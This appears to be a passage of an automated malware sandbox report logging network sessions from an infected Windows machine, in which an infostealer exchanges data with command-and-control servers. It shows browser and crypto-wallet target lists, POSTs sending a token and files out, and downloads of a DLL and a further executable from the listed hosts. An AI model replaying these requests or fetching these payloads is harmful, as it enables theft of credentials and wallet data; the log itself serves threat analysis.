R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Dec 14, 2024 12:56:33.871342897 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Dec 14, 2024 12:56:33.872597933 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="message"plugins------CGHCGIIDGDAKFIEBKFCF--
Dec 14, 2024 12:56:34.320683002 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:34 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Dec 14, 2024 12:56:34.320741892 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Dec 14, 2024 12:56:34.320777893 CET	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Dec 14, 2024 12:56:34.320908070 CET	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Dec 14, 2024 12:56:34.320961952 CET	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Dec 14, 2024 12:56:34.320997000 CET	620	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Dec 14, 2024 12:56:34.512703896 CET	544	IN	Data Raw: 5a 57 52 69 61 6d 6c 76 61 58 42 6e 62 47 64 6a 59 6d 4e 74 62 6d 4a 77 5a 32 78 70 62 32 5a 38 4d 58 77 77 66 44 42 38 56 47 39 75 61 32 56 6c 63 47 56 79 49 46 64 68 62 47 78 6c 64 48 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c 71 5a 57 Data Ascii: ZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5
Dec 14, 2024 12:56:34.514286995 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBA Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 2d 2d 0d 0a Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="message"fplugins------JDHIEBFHCAKEHIDGHCBA--
Dec 14, 2024 12:56:34.961358070 CET	335	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:34 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Dec 14, 2024 12:56:34.987230062 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJD Host: 185.215.113.206 Content-Length: 6851 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 12:56:34.987279892 CET	6851	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 Data Ascii: ------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 14, 2024 12:56:35.961976051 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 12:56:36.295130014 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 14, 2024 12:56:36.757091045 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:36 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Dec 14, 2024 12:56:36.757134914 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Dec 14, 2024 12:56:36.757172108 CET	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49837	34.107.221.82	80	4128	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:32.488033056 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:56:33.576134920 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76700 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49853	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:38.891308069 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 31 36 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015168001&unit=246122658369
Dec 14, 2024 12:56:40.234381914 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49860	31.41.244.11	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:40.593476057 CET	62	OUT	GET /files/burpin1/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 14, 2024 12:56:41.920783997 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:41 GMT Content-Type: application/octet-stream Content-Length: 4438776 Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT Connection: keep-alive ETag: "675784f0-43baf8" Accept-Ranges: bytes Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`\|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
Dec 14, 2024 12:56:41.920804977 CET	224	IN	Data Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1 Data Ascii: jZQ39FY~9F~fAfG@;F\|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A\|At>E;Ew6rE;Es,jPYYtlAj@ AEPjh5XAA3
Dec 14, 2024 12:56:41.920824051 CET	1236	IN	Data Raw: c9 c2 0c 00 8b 44 24 08 85 c0 74 0c a3 6c e9 41 00 b8 05 40 00 80 eb 3a 56 8b 74 24 08 57 8d 7e 24 83 3f 00 74 0f 8b 4e 20 8d 46 34 50 83 c1 08 e8 c0 11 01 00 8b cf e8 da 29 01 00 83 7e 1c 00 74 0c ff 76 40 ff 76 28 ff 15 80 a1 41 00 5f 33 c0 5e Data Ascii: D$tlA@:Vt$W~$?tN F4P)~tv@v(A_3^UVuA}juuv(j}iuv(jjuVP^]=AtjA=XAtL$AVQ3=lAQjjPR=Atj5XAA^L$
Dec 14, 2024 12:56:41.920842886 CET	1236	IN	Data Raw: 8b 76 0c 85 f6 59 74 06 8b 06 56 ff 50 08 5e c3 83 6c 24 04 04 e9 76 ff ff ff 56 6a 01 8b f1 e8 d3 fc ff ff 8b 46 04 8b 0e 66 8b 54 24 08 66 89 14 41 ff 46 04 8b 46 04 8b 0e 66 83 24 41 00 8b c6 5e c2 04 00 55 8b ec ff 75 0c 8b 4d 08 e8 03 fc ff Data Ascii: vYtVP^l$vVjFfT$fAFFf$A^UuMuME]Vt$NFuhVrzY3^Uh$AuYYtEMPQ3hAu{YYu@]L$IAujP3VNXAD
Dec 14, 2024 12:56:41.921114922 CET	1236	IN	Data Raw: 8d 55 d4 0f 95 c0 52 6a 0c ff 75 0c 89 46 3c 8b 46 0c 8b 08 50 ff 51 18 3b c7 89 45 0c 74 19 8d 4d d4 e8 fe 08 01 00 ff 75 f0 e8 ec 75 01 00 8b 7d 0c 59 e9 cf fe ff ff 0f b7 45 d4 3b c7 74 1a 83 f8 40 74 07 6a 66 e9 71 ff ff ff 8b 45 dc 89 46 34 Data Ascii: URjuF<FPQ;EtMuu}YE;t@tjfqEF4EF8EPAF4PEPA9~<t3Y>jh/N4QPYY%jlu;YtxXAH3PMF (F jQHxx,
Dec 14, 2024 12:56:41.921155930 CET	672	IN	Data Raw: 64 a1 41 00 eb 7a 83 3d 90 e9 41 00 00 75 6f 8b 35 68 a1 41 00 68 d0 a5 41 00 bb c4 a5 41 00 53 c7 05 90 e9 41 00 01 00 00 00 ff d6 8b 3d 6c a1 41 00 50 ff d7 6a 00 89 45 fc 0f b7 05 80 e9 41 00 68 09 04 00 00 6a 00 50 8d 45 bc 68 a8 a5 41 00 50 Data Ascii: dAz=Auo5hAhAASA=lAPjEAhjPEhAPA}uhASPEtjEPjU3_^[U,SVW3WAjXPE0A}j`X5TAj`jdPv\|=j[j=j[j_EPju@AWSuW
